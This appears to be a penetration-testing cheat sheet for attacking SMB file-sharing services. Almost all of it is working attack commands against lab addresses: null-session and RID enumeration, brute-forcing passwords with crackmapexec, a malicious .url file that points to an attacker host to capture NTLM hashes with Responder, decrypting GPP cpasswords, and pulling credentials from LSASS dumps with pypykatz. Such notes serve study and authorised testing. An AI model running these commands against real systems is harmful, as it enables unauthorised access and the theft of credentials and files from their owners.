Server Message Block

Footprinting The Service

Nmap

sudo nmap 10.129.14.128 -sV -sC -p139,445

RPCclient

rpcclient -U "" 10.129.14.128

rpcclient -U'%' 10.10.110.17

Query

Description

srvinfo

Server information.

enumdomains

Enumerate all domains that are deployed in the network.

querydominfo

Provides domain, server, and user information of deployed domains.

netshareenumall

Enumerates all available shares.

netsharegetinfo <share>

Provides information about a specific share.

enumdomusers

Enumerates all domain users.

queryuser <RID>

Provides information about a specific user.

Search For Known SMB Version Vulnerabilities

Check For Shares Using Null Sessions

smbclient -N -L //$ip/

cme smb $ip --shares -u "guest" -p ""

Brute Forcing

cme smb $ip -u users.list -p pws.list --local-auth | grep '[+]'

URL File attacks

Test for URL File attacks by creating a file called "@somename.url" with the following contents, upload, spin up smbserver to capture hash

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\EnterAttackerip\%USERNAME%.icon
IconIndex=1

Run Responder to capture hashes

/opt/Responder-3.1.3.0/Responder.py -I tun0

Read / Upload access

Attempt to download and view share contents using valid credential / anonymous login / null session

smbmap -H $ip

smbmap -H $ip -r

smbmap -H 10.129.14.128 --download "notes\note.txt"

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

smbmap -u guest -p "" -H $ip -A '.*' -R

Cpassword discovery

Search "Groups.xml" for cpassword decryption

gpp-decrypt cpassword

lsass.zip lsass.dmp

search lsass.zip or lsass.dmp to use to dump credentials / keys / tickets

pypykatz lsa minidump "lsass.zip"

Alternate Data Streams (ADS)

test for alternate data streams after discovering 0 byte files

allinfo filename

Check Password Policy

cme smb $ip --pass-pol -u guest -p ""

User Discovery

Check For users using valid credential / anonymous login / null session

cme smb $ip --users -u guest -p ""

cme smb $ip --rid-brute -u guest -p ""

Group discovery

check for groups using valid credential / anonymous login / null session

cme smb $ip --groups -u guest -p ""

Smbclient

Interactively access the smb shares using smbclient

smbclient //$ip/someshare -N

smbclient //$ip/someshare -U 'guest' -N

smbclient //$ip/someshare -U 'validuser' -p 'validpass'

Smbmap

// Some code

Dangerous Settings

Setting

Description

browseable = yes

Allow listing available shares in the current share?

read only = no

Forbid the creation and modification of files?

writable = yes

Allow users to create and modify files?

guest ok = yes

Allow connecting to the service without using a password?

enable privileges = yes

Honor privileges assigned to specific SID?

create mask = 0777

What permissions must be assigned to the newly created files?

directory mask = 0777

What permissions must be assigned to the newly created directories?

logon script = script.sh

What script needs to be executed on the user's login?

magic script = script.sh

Which script should be executed when the script gets closed?

magic output = script.out

Where the output of the magic script needs to be stored?

PreviousRemote Procedure Call NextSimple Network Management Protocol

Last updated 1 year ago

hashtagFootprinting The Service

hashtagNmap

hashtagRPCclient

hashtagSearch For Known SMB Version Vulnerabilities

hashtagCheck For Shares Using Null Sessions

hashtagBrute Forcing

hashtagURL File attacks

hashtagRead / Upload access

hashtagCpassword discovery

hashtaglsass.zip lsass.dmp

hashtagAlternate Data Streams (ADS)

hashtagCheck Password Policy

hashtagUser Discovery

hashtagGroup discovery

hashtagSmbclient

hashtagSmbmap

hashtagDangerous Settings